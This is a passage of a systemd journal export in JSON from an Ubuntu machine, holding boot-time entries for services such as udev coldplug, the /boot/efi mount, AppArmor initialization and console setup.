"e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started udev Coldplug all Devices.", "UNIT" : "systemd-udev-trigger.service", "INVOCATION_ID" : "880103d45fc6499fa0bf439eb2b31545", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780124301" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ec;b=e2b08827b5804427b422c10c84f1567e;m=596db5;t=5bd16dd1ced1c;x=2ce32247415e65b0", "__REALTIME_TIMESTAMP" : "1615280780143900", "__MONOTONIC_TIMESTAMP" : "5860789", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Set the console keyboard layout.", "UNIT" : "keyboard-setup.service", "INVOCATION_ID" : "88391c49fb4a4866b11a14cff32627b9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780141400" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ed;b=e2b08827b5804427b422c10c84f1567e;m=598031;t=5bd16dd1cff98;x=288e5cb33d396f96", "__REALTIME_TIMESTAMP" : "1615280780148632", "__MONOTONIC_TIMESTAMP" : "5865521", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Started Dispatch Password Requests to Console Directory Watch.", "UNIT" : "systemd-ask-password-console.path", "INVOCATION_ID" : "5b12b92bcd6f4700a8056df2d51f2500", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780145529" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ee;b=e2b08827b5804427b422c10c84f1567e;m=599744;t=5bd16dd1d16ac;x=743f8dae205b830a", "__REALTIME_TIMESTAMP" : "1615280780154540", "__MONOTONIC_TIMESTAMP" : "5871428", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local Encrypted Volumes.", "UNIT" : "cryptsetup.target", "INVOCATION_ID" : "e167c4ac112d4163b1132569ae1999dc", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780151879" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ef;b=e2b08827b5804427b422c10c84f1567e;m=59b0da;t=5bd16dd1d3041;x=3b7b8b0d01bd86dd", "__REALTIME_TIMESTAMP" : "1615280780161089", "__MONOTONIC_TIMESTAMP" : "5877978", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems (Pre).", "UNIT" : "local-fs-pre.target", "INVOCATION_ID" : "8775097a2b9d438eb78e2d0195363732", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780158334" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f0;b=e2b08827b5804427b422c10c84f1567e;m=5f3294;t=5bd16dd22b1fc;x=9bd3cb671a6f47b3", "__REALTIME_TIMESTAMP" : "1615280780521980", "__MONOTONIC_TIMESTAMP" : "6238868", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_PID" : "409", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780521851" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f1;b=e2b08827b5804427b422c10c84f1567e;m=60e5fe;t=5bd16dd246565;x=70999a101e00351a", "__REALTIME_TIMESTAMP" : "1615280780633445", "__MONOTONIC_TIMESTAMP" : "6350334", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/ttyS0.", "UNIT" : "dev-ttyS0.device", "INVOCATION_ID" : "293ed7c0e80948c39b31c3279654da1d", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780631229" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f2;b=e2b08827b5804427b422c10c84f1567e;m=621e23;t=5bd16dd259d8a;x=648886d4bbc9a161", "__REALTIME_TIMESTAMP" : "1615280780713354", "__MONOTONIC_TIMESTAMP" : "6430243", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Listening on Load/Save RF Kill Switch Status /dev/rfkill Watch.", "UNIT" : "systemd-rfkill.socket", "INVOCATION_ID" : "3484c3c7a8ea4120a1c191923754f101", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780709645" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f3;b=e2b08827b5804427b422c10c84f1567e;m=62289e;t=5bd16dd25a806;x=f8d08e8ec74b004e", "__REALTIME_TIMESTAMP" : "1615280780716038", "__MONOTONIC_TIMESTAMP" : "6432926", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_SYSTEMD_SLICE" : "system.slice", "_TRANSPORT" : "journal", "_CAP_EFFECTIVE" : "3fffffffff", "CODE_FILE" : "../src/udev/net/ethtool-util.c", "CODE_LINE" : "547", "CODE_FUNC" : "ethtool_set_glinksettings", "SYSLOG_IDENTIFIER" : "systemd-udevd", "MESSAGE" : "link_config: autonegotiation is unset or enabled, the speed and duplex are not writable.", "_COMM" : "systemd-udevd", "_EXE" : "/lib/systemd/systemd-udevd", "_CMDLINE" : "/lib/systemd/systemd-udevd", "_SYSTEMD_CGROUP" : "/system.slice/systemd-udevd.service", "_SYSTEMD_UNIT" : "systemd-udevd.service", "_SYSTEMD_INVOCATION_ID" : "89c0d2fdde724d04a2914eb8feba20c7", "_PID" : "411", "_SOURCE_REALTIME_TIMESTAMP" : "1615280780716029" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f4;b=e2b08827b5804427b422c10c84f1567e;m=67191c;t=5bd16dd2a9882;x=f359e2cba0ff9606", "__REALTIME_TIMESTAMP" : "1615280781039746", "__MONOTONIC_TIMESTAMP" : "6756636", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Found device /dev/disk/by-label/UEFI.", "UNIT" : "dev-disk-by-label-UEFI.device", "INVOCATION_ID" : "5c43576c87dc4326a86b3081ce645102", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781038616" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f5;b=e2b08827b5804427b422c10c84f1567e;m=67369d;t=5bd16dd2ab604;x=7e47c4b15c12240b", "__REALTIME_TIMESTAMP" : "1615280781047300", "__MONOTONIC_TIMESTAMP" : "6764189", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Mounting /boot/efi...", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781046777" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f6;b=e2b08827b5804427b422c10c84f1567e;m=6803fa;t=5bd16dd2b8361;x=d5c232e837e738ae", "__REALTIME_TIMESTAMP" : "1615280781099873", "__MONOTONIC_TIMESTAMP" : "6816762", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "boot-efi.mount", "INVOCATION_ID" : "6a4e024c144a4cccb32d6a9dbf13382f", "MESSAGE" : "Mounted /boot/efi.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781095873" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f7;b=e2b08827b5804427b422c10c84f1567e;m=6804df;t=5bd16dd2b8446;x=37eb2db56a93c4b0", "__REALTIME_TIMESTAMP" : "1615280781100102", "__MONOTONIC_TIMESTAMP" : "6816991", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "MESSAGE" : "Reached target Local File Systems.", "UNIT" : "local-fs.target", "INVOCATION_ID" : "1dacf109c01042b8b9e02d10371c1b1c", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781098003" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f8;b=e2b08827b5804427b422c10c84f1567e;m=680a8c;t=5bd16dd2b89f3;x=4910c4745d1d7773", "__REALTIME_TIMESTAMP" : "1615280781101555", "__MONOTONIC_TIMESTAMP" : "6818444", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Create Volatile Files and Directories...", "UNIT" : "systemd-tmpfiles-setup.service", "INVOCATION_ID" : "5e70a567d5ea41bca036432fe845e916", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781101547" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1f9;b=e2b08827b5804427b422c10c84f1567e;m=682f82;t=5bd16dd2baee9;x=b533bcff03066bd8", "__REALTIME_TIMESTAMP" : "1615280781111017", "__MONOTONIC_TIMESTAMP" : "6827906", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Tell Plymouth To Write Out Runtime Data...", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781108890" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fa;b=e2b08827b5804427b422c10c84f1567e;m=684d79;t=5bd16dd2bcce0;x=39cd496056218fc", "__REALTIME_TIMESTAMP" : "1615280781118688", "__MONOTONIC_TIMESTAMP" : "6835577", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Set console font and keymap...", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781116825" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fb;b=e2b08827b5804427b422c10c84f1567e;m=686e85;t=5bd16dd2beded;x=c38475369e87d84a", "__REALTIME_TIMESTAMP" : "1615280781127149", "__MONOTONIC_TIMESTAMP" : "6844037", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting ebtables ruleset management...", "UNIT" : "ebtables.service", "INVOCATION_ID" : "ca659a18573443f4b7253369397d23c9", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781125009" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fc;b=e2b08827b5804427b422c10c84f1567e;m=6887aa;t=5bd16dd2c0711;x=3a5b6560f5f3420d", "__REALTIME_TIMESTAMP" : "1615280781133585", "__MONOTONIC_TIMESTAMP" : "6850474", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting AppArmor initialization...", "UNIT" : "apparmor.service", "INVOCATION_ID" : "b73e15f39a704474b132a5d88c306fdb", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781131338" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fd;b=e2b08827b5804427b422c10c84f1567e;m=68a7dd;t=5bd16dd2c2744;x=c4a43ea0df13bba7", "__REALTIME_TIMESTAMP" : "1615280781141828", "__MONOTONIC_TIMESTAMP" : "6858717", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "CODE_FILE" : "../src/core/unit.c", "CODE_LINE" : "1718", "CODE_FUNC" : "unit_status_log_starting_stopping_reloading", "MESSAGE_ID" : "7d4958e842da4a758f6c1cdc7b36dcc5", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "MESSAGE" : "Starting Commit a transient machine-id on disk...", "UNIT" : "systemd-machine-id-commit.service", "INVOCATION_ID" : "a7cc3d2edc2d455f8262a9365ac0e1e2", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781139336" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1fe;b=e2b08827b5804427b422c10c84f1567e;m=68e4be;t=5bd16dd2c6425;x=7b9454eaca1e6031", "__REALTIME_TIMESTAMP" : "1615280781157413", "__MONOTONIC_TIMESTAMP" : "6874302", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "console-setup.service", "INVOCATION_ID" : "d076bfd203c341b0aa9ae47eee197dc7", "MESSAGE" : "Started Set console font and keymap.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781154519" } { "__CURSOR" : "s=d9fa7adefbe34ae1aa61d7656b4137d4;i=1ff;b=e2b08827b5804427b422c10c84f1567e;m=692751;t=5bd16dd2ca6b9;x=a0284d33fd2653c0", "__REALTIME_TIMESTAMP" : "1615280781174457", "__MONOTONIC_TIMESTAMP" : "6891345", "_BOOT_ID" : "e2b08827b5804427b422c10c84f1567e", "_MACHINE_ID" : "e78d8f41d6784acabc245165b0ac7fef", "_HOSTNAME" : "ubuntu", "PRIORITY" : "6", "SYSLOG_FACILITY" : "3", "SYSLOG_IDENTIFIER" : "systemd", "_UID" : "0", "_GID" : "0", "_SELINUX_CONTEXT" : "unconfined\n", "_TRANSPORT" : "journal", "_PID" : "1", "_COMM" : "systemd", "_EXE" : "/lib/systemd/systemd", "_CMDLINE" : "/sbin/init", "_CAP_EFFECTIVE" : "3fffffffff", "_SYSTEMD_CGROUP" : "/init.scope", "_SYSTEMD_UNIT" : "init.scope", "_SYSTEMD_SLICE" : "-.slice", "CODE_FILE" : "../src/core/job.c", "CODE_LINE" : "842", "CODE_FUNC" : "job_log_status_message", "JOB_TYPE" : "start", "JOB_RESULT" : "done", "MESSAGE_ID" : "39f53479d3a045ac8e11786248231fbf", "UNIT" : "plymouth-read-write.service", "INVOCATION_ID" : "bb9896e20e1245a5accc30ae97de9802", "MESSAGE" : "Started Tell Plymouth To Write Out Runtime Data.", "_SOURCE_REALTIME_TIMESTAMP" : "1615280781168846" } { "__CURSOR" : 